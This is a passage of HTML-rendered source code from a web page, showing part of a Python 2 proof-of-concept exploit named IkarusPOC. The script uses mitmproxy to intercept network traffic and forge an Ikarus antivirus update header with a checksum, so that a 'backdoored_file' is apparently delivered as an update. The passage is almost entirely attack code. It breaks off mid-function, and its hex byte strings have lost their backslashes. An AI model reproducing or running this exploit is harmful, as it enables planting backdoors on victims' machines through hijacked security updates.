class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f5d60531148303101-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f5d60531148303101-104\">104<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-1\"><span class=\"crayon-p\">#!\/usr\/bin\/env python2<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">os<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-3\"><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">mitmproxy <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">controller<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">proxy<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">platform<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-5\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">mitmproxy<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">proxy<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">server <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">ProxyServer<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-6\"><span class=\"crayon-v\">except<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">libmproxy <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">controller<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">proxy<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">platform<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-8\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">libmproxy<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">proxy<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">server <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">ProxyServer<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-10\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">re<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-11\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-t\">struct<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-12\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-13\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">zlib<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-14\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">bz2<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-16\"><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">IkarusPOC<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">controller<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">Master<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">__init__<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">backdoored_file<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">controller<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">Master<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">__init__<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ikarus<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">crc_file<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">backdoored_file<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">backdoored_file<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-22\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">to_replace<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">already_patched<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_number<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">win_header<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_header<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x49x4Bx55x50x00x00x00x00x3Cx00x00x00x00x00x00x00&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_header<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_header<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;I&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">to_replace<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># update number<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_header<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;I&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">crc_file<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># checksum<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_header<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_header<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x00x00x00x00&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-33\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">run<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">controller<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">Master<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">run<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">except <\/span><span class=\"crayon-v\">KeyboardInterrupt<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">shutdown<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-39\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">crc_stream<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">a_string<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">prev<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">zlib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">crc32<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">a_string<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">prev<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xFFFFFFFF<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-43\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">crc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">some_file<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">prev<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">eachLine <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">some_file<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;rb&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">prev<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">zlib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">crc32<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">eachLine<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">prev<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">crc_file<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">prev<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xFFFFFFFF<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[*] crc_file&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">crc_file<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-50\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-51\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">handle_request<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-52\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">hid<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">reply<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-54\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">handle_response<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 